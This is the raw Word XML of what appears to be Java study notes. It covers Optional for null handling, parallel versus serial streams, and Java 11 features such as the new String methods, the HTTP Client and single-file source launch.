      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E839D7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with method reference to avoid NPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3CE31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ofNullable(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE051FA"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String::toUpperCase) // Convert name to upper case if not null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B5CA3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Present(System.out::println); // Print if present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1CB8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51DB992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08EE3C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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C614A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the primary way to handle NullPointerException in Java 8 and helps you work with potentially null values in a more declarative way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12205B"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bjects.requireNonNull()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help validate that an object is not null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087021EC"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Use traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ternary operator</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as fallback methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D20C9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to keep the code clean and concise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2538C22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Using these modern techniques helps in writing cleaner, more maintainable code while preventing NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21005991" w14:textId="274D850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75" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8FA6DC" w14:textId="4B155E9F" w:rsidR="0095652C" w:rsidRPr="00CE4B95" w:rsidRDefault="0095652C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="_Toc197867474"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Parallel Stream and Serial Stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="260"/>
    </w:p>
    <w:p w14:paraId="2D71FE8E" w14:textId="2052DB73" w:rsidR="0095652C" w:rsidRPr="00CE4B95"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ial Stream (Sequential Stream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CF452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one by one in a single thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BA8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the original order of the data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A2DCB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r for tasks where order matters or there are side effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF98F6D"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03EE04C"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72F9774"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340FBEA" w14:textId="7EDCB690"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threaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86C277"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76" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF1D4E"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allel Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79741D8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 unless explicitly handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6FF8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tateless, independent, and non-blocking operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A60A3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02E0810"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70F815BE"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22CE1E34" w14:textId="7B64E28D"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ulti-threaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F2F5E" w14:textId="52405208"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CE4B95" w14:paraId="285413BE" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1468FD85"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6E4B8C" w:rsidRPr="00CE4B95" w14:paraId="0A812FC7" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C86205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ForkJoinPool)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="4EAEDFEB" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1912A1C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large, CPU-heavy tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="309921B0" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25D11A82"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="5B7DFD1E" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAE33C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hread-safety is important</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="04FB959F" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B64453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datasets, independent tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="59C3F75F" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A7B7F9"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Stream()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C7863D4"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Parallel Stream?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619AA6A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 it when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFDA327"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et is large</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8A24E"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are stateless, non-blocking, and independent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2D831" w14:textId="5E14B174" w:rsidR="006E4B8C"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utilize multi-core CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC865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void if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D6AD6"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involves shared mutable state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE4803"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depends on processing order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929334E" w14:textId="5327F351" w:rsidR="006E4B8C"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makes the program slower due to context switching or I/O delays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA20316"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77" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D5555" w14:textId="18ADE86C"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Preserve Order in Parallel Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F7EE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till want parallelism with order, use .forEachOrdered():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28518C8E" w14:textId="77777777"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577E73C3" w14:textId="27659534"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Order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eps order but reduces performance gain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE9B87" w14:textId="531BE2C0" w:rsidR="00032852" w:rsidRPr="00CE4B95"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78" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00032852" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33314C48" w14:textId="7097B26C" w:rsidR="00E90957" w:rsidRPr="00CE4B95" w:rsidRDefault="00032852" w:rsidP="00032852">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="261" w:name="_Toc197867475"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java 11 Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="261"/>
    </w:p>
    <w:p w14:paraId="674F82AC" w14:textId="77777777" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89" w:rsidP="00370A89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228C84A2" w14:textId="0BBAE2B0" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="262" w:name="_Toc197867476"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java 11 features?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="262"/>
    </w:p>
    <w:p w14:paraId="03C8FE5E" w14:textId="7811FE84" w:rsidR="00370A89" w:rsidRPr="00CE4B95"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1 Features Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0CA4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21CDD1E1">
          <v:rect id="_x0000_i1779" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2056D20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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local-Variable Syntax for Lambda Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC383F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now use var in lambda expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E0575" w14:textId="79A1DE47" w:rsidR="00680A5C" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="568770A6"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Benefit: Useful when you want to add annotations to parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F96384"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6FF9622D">
          <v:rect id="_x0000_i1780" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B7A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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> New String Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B098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CE4B95" w14:paraId="4852AFCC" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B9B152"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FD48DD9"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6D4FDD23" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="272F099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isBlank()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="528FAF9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hecks if the string is empty or whitespace only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="4C014C6D" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE38B2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lines()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="535DAEA2"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a multiline string into a stream of lines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="59FA4947" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DDC7B0"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F429FD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and trailing white space (Unicode-aware)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="663E7A71" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71DA0AA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Leading()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54D764A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whitespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="1045A42D" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05EC3E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Trailing()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5320115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trailing whitespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="2C99E8D5" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AB81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int)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6295EC5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s the string multiple times</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DF8F0D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Java "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523BDD8A"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Blan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5DAEDFF5"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B\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n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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2984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3AB38104" w14:textId="4DF00671"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ea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Hello Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B4A6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4D385674">
          <v:rect id="_x0000_i1781" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711193F"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP Client (Standardized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56024D9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The new HTTP Client API introduced in Java 9 is now standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C9252"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Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cli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HttpClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26185A"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quest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> requ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Builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280EFE4"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s://example.com"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677FC45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B9BEE29"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odyHandl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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3235A1" w14:textId="0B5AFED3"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dy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0BD43"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5596E98">
          <v:rect id="_x0000_i1782" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="188978F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Collection.toArray(IntFunction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1D24C"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method to convert a collection to an array using a generator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A08BF3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p>
    <w:p w14:paraId="31F3FA1C" w14:textId="11C7591E"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p>
    <w:p w14:paraId="0846D83E"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2F47783">
          <v:rect id="_x0000_i1783" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E26A50"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otable Removals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291543D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 and CORBA Modules were removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8ABE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g., Removed: javax.xml.bind, javax.activation, java.se.ee, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648A9F8"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799C292">
          <v:rect id="_x0000_i1784" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD672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Launch Single-File Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31607B67" w14:textId="066BFA23"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run a .java file directly without compiling it manually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6AF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HelloWorld.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1588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Useful for quick scripts and testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D73E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30CA16AF">
          <v:rect id="_x0000_i1785" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9353EE"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light Recorder and Mission Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07BF8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DK Flight Recorder and Java Mission Control are now part of the JDK for better performance monitoring and diagnostics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B97BB"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3D50187">
          <v:rect id="_x0000_i1786" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="560893CF" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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CE4B95" w14:paraId="5C72A807" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="221B52DA"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0D464931"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7925D543" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35A4FC7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var in Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15765EF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nables use of var in lambda parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="39D1C025" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
